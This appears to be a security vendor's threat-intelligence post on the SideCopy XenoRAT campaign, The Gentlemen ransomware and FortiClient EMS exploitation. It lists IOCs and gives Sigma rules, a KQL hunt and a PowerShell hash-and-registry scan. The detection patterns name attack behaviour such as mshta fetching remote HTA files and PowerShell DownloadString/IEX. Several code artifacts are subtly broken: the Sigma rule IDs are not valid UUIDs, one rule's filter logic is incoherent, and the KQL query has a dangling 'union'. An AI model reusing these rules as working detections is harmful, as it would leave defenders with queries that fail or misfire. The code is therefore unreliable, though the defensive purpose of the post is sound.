Back to Intelligence

Operation XENOFISCAL & The Gentlemen: OTX Pulse Analysis — SideCopy XenoRAT, Storm-2697 RaaS & FortiClient EMS Exploitation

SA
Security Arsenal Team
May 29, 2026
6 min read

Recent OTX Pulse data indicates a convergence of nation-state espionage, cybercrime commoditization, and infrastructure exploitation. SideCopy (APT36) is actively targeting the Afghanistan Ministry of Finance using a sophisticated spear-phishing chain delivering XenoRAT, while the Storm-2697 threat group has operationalized "The Gentlemen," a Go-based ransomware-as-a-service (RaaS) platform featuring self-propagating capabilities. Simultaneously, a critical authentication bypass vulnerability in FortiClient EMS (CVE-2026-35616) is being exploited in the wild to deliver the EKZ Infostealer disguised as legitimate software patches.

Collectively, these campaigns highlight a shift toward "trusted infrastructure abuse"—leveraging compromised education domains, endpoint management systems, and RaaS affiliate models to maximize infection rates while evading detection.

Threat Actor / Malware Profile

SideCopy (APT36 / Transparent Tribe)

  • Objective: Espionage and data exfiltration from government and financial sectors in South Asia.
  • Malware: XenoRAT (Remote Access Trojan).
  • Distribution: Spear-phishing emails containing Pashto-language LNK files masquerading as staff directories.
  • Attack Chain: LNK execution triggers mshta.exe to fetch remote HTA payloads from compromised .edu.af domains. The HTA serves as a multi-stage loader to deploy the XenoRAT payload.
  • Persistence: Uses Registry Run keys and Scheduled Tasks for persistent access.

Storm-2697 (The Gentlemen RaaS)

  • Objective: Financial extortion via broad network compromise.
  • Malware: The Gentlemen (Go-based encryptor).
  • Distribution: RaaS model recruiting affiliates via BreachForums; utilizes self-propagating vectors (likely SMB/RDP brute-forcing or worm-like features).
  • Behavior: Implements per-file encryption using Curve25519 and XChaCha20 stream cipher. Written in Go language to hinder static analysis and ensure cross-platform compatibility.

EKZ Infostealer Campaign

  • Objective: Credential theft and initial access brokering.
  • Malware: EKZ Infostealer.
  • Distribution: Exploitation of CVE-2026-35616 in FortiClient EMS.
  • Attack Chain: Improper access control allows unauthenticated API requests. Attackers push malicious PowerShell scripts to managed endpoints, disguised as Fortinet patches.

IOC Analysis

The provided IOCs span infrastructure, file artifacts, and vulnerability identifiers:

  • Network Infrastructure: IP 103.132.98.224 and domain abimj.edu.af are linked to the SideCopy C2 and payload delivery. SOC teams should immediately block these at the perimeter and inspect logs for historical connections.
  • File Artifacts: A mix of SHA256, MD5, and SHA1 hashes are provided for the LNK droppers, HTA payloads, XenoRAT binaries, and The Gentlemen encryptor. These should be ingested into EDR solutions for threat hunting.
  • Vulnerabilities: CVE-2026-35616 (FortiClient EMS) is the primary vector for the EKZ campaign. Asset management teams must identify vulnerable EMS instances immediately.

Operational Guidance:

  1. Blocklist: Add all IPs and domains to firewall blocklists and secure web gateways.
  2. EDR Telemetry: Query endpoints for the specific file hashes listed in the IOCs.
  3. Web Proxies: Inspect traffic for suspicious mshta.exe processes initiating connections to non-standard ports or domains.

Detection Engineering

Sigma Rules

YAML
title: Suspicious Mshta Execution via Remote LNK - SideCopy
id: 3b4194bd-fe40-d940-31a9-4b30397ffd8a
status: experimental
description: Detects SideCopy activity where mshta.exe is launched to fetch remote HTA payloads, often following a malicious LNK file execution.
references:
    - https://otx.alienvault.com/pulse/66548a92f8a64d4c84a4f6c6
author: Security Arsenal
date: 2026/05/30
tags:
    - attack.initial_access
    - attack.execution
    - attack.t1204.002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\mshta.exe'
        CommandLine|contains:
            - '.hta'
            - 'http'
    filter_legit:
        ParentImage|endswith:
            - '\explorer.exe'
        # SideCopy often uses unusual command line lengths or encoded parameters
        CommandLine|re: '.*[a-fA-F0-9]{20,}.*'
    condition: selection and not filter_legit
falsepositives:
    - Legitimate administrative scripts
level: high
---
title: FortiClient EMS Exploitation Attempt via PowerShell - CVE-2026-35616
id: 0da123adf9-2519-57a4-b850-a3f6bd6a753d
status: experimental
description: Detects potential exploitation of FortiClient EMS where PowerShell scripts are executed by the EMS service or pushed to endpoints bypassing standard auth.
references:
    - https://otx.alienvault.com/pulse/66548a92f8a64d4c84a4f6c7
author: Security Arsenal
date: 2026/05/30
tags:
    - attack.defense_evasion
    - attack.privilege_escalation
    - cve-2026-35616
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\powershell.exe'
    selection_parent:
        ParentImage|contains:
            - 'FortiClientEMS'
            - 'FortiEMS'
    selection_cli:
        CommandLine|contains:
            - 'DownloadString'
            - 'IEX'
            - 'Invoke-Expression'
            - 'patch'
    condition: all of selection_*
falsepositives:
    - Legitimate Fortinet patch deployment scripts (verify source)
level: critical
---
title: The Gentlemen Ransomware Execution - Go Binary Heuristics
id: 22b38dad7da0-97ea-03aa-28d0614164cd
status: experimental
description: Detects the execution of The Gentlemen ransomware based on known file hashes and suspicious process behavior typical of Go-based encryptors.
references:
    - https://otx.alienvault.com/pulse/66548a92f8a64d4c84a4f6c8
author: Security Arsenal
date: 2026/05/30
tags:
    - attack.impact
    - attack.t1486
logsource:
    category: file_event
    product: windows
detection:
    selection_hashes:
        Hashes|contains:
            - '22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67'
            - 'fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68'
    condition: selection_hashes
falsepositives:
    - None
level: critical

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for SideCopy IOCs and suspicious mshta activity
let XenoRAT_Hashes = dynamic(["3b4194bdfe40d94031a94b30397ffd8a4b09d0a4057668e897b8bdcd1703dd01", "99127c8c67d90e2776beeb85281f9c68399bf4567b07a6b638d68b760212e88d"]);
let Gentlemen_Hashes = dynamic(["22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67", "fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68"]);
let EKZ_Hashes = dynamic(["0da123adf9251957a4b850a3f6bd6a753dd4892be176a84a18450e899534cc5e"]);
let C2_IP = "103.132.98.224";

// 1. Process Creation with known IOCs
DeviceProcessEvents
| where Timestamp > ago(7d)
| where SHA256 in (XenoRAT_Hashes) or SHA256 in (Gentlemen_Hashes) or SHA256 in (EKZ_Hashes)
| project Timestamp, DeviceName, FileName, ProcessCommandLine, FolderPath, SHA256, InitiatingProcessFileName

union 
(
    // 2. Network Connections to SideCopy C2
    DeviceNetworkEvents
    | where Timestamp > ago(7d)
    | where RemoteIP == C2_IP
    | project Timestamp, DeviceName, RemoteIP, RemoteUrl, InitiatingProcessFileName
),
(
    // 3. Suspicious mshta execution patterns
    DeviceProcessEvents
    | where Timestamp > ago(7d)
    | where FileName =~ "mshta.exe"
    | where ProcessCommandLine contains ".hta" or ProcessCommandLine contains "http"
    | project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessFileName, AccountName
)

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    IOCs Hunt Script for Operation XENOFISCAL, The Gentlemen, and EKZ Infostealer.
.DESCRIPTION
    Scans the filesystem for specific file hashes and checks registry for suspicious persistence mechanisms.
#>

$XenoRAT_Hashes = @(
    "3b4194bdfe40d94031a94b30397ffd8a4b09d0a4057668e897b8bdcd1703dd01",
    "99127c8c67d90e2776beeb85281f9c68399bf4567b07a6b638d68b760212e88d"
)

$Gentlemen_Hashes = @(
    "22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67",
    "fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68"
)

$EKZ_Hashes = @(
    "0da123adf9251957a4b850a3f6bd6a753dd4892be176a84a18450e899534cc5e"
)

$MaliciousHashes = $XenoRAT_Hashes + $Gentlemen_Hashes + $EKZ_Hashes

Write-Host "[+] Scanning for malicious file hashes..." -ForegroundColor Cyan

# Scan C: drive (adjust as needed)
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
    Where-Object { 
        $_.Length -gt 0kb -and 
        $MaliciousHashes -contains (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash 
    } | 
    Select-Object FullName, LastWriteTime | 
    Format-Table -AutoSize

Write-Host "[+] Checking for XenoRAT persistence (Registry Run keys)..." -ForegroundColor Cyan
$RunPaths = @("HKLM:\Software\Microsoft\Windows\CurrentVersion\Run", 
               "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run")

foreach ($Path in $RunPaths) {
    if (Test-Path $Path) {
        Get-ItemProperty -Path $Path | 
        Get-Member -MemberType NoteProperty | 
        Where-Object { $_.Name -ne "PSPath" -and $_.Name -ne "PSChildName" } | 
        ForEach-Object {
            $Val = (Get-ItemProperty -Path $Path).$($_.Name)
            if ($Val -match "mshta" -or $Val -match ".hta") {
                Write-Host "[!] Suspicious persistence found in $Path : $($_.Name) = $Val" -ForegroundColor Red
            }
        }
    }
}

Write-Host "[!] Hunt complete. Review findings." -ForegroundColor Green


# Response Priorities

*   **Immediate:**
    *   **Patch:** Apply the patch for CVE-2026-35616 to all FortiClient EMS instances immediately.
    *   **Block:** Block network connectivity to IP `103.132.98.224` and domain `abimj.edu.af`.
    *   **Hunt:** Scan endpoints for the SHA256 hashes provided for XenoRAT, The Gentlemen, and EKZ.

*   **24 Hours:**
    *   **Investigate:** Identify if any endpoints communicated with the identified C2 infrastructure.
    *   **Credential Reset:** If EKZ Infostealer is suspected, force a password reset for privileged accounts and rotate API keys potentially exposed via VPN configuration abuse.
    *   **Review:** Analyze logs for evidence of the Fortinet "patch" script execution (`powershell.exe` spawned by EMS services).

*   **1 Week:**
    *   **Architecture:** Segment management servers (like EMS) from the general network to reduce blast radius of API exploits.
    *   **Hardening:** Implement Application Control policies to block `mshta.exe` execution from user directories and restrict PowerShell usage to signed scripts only.
    *   **Training:** Alert Finance and Government users regarding Pashto-language spear-phishing lures.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-malwaresidecopyxenoratthe-gentlemenforticlient-emsekz-infostealer

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action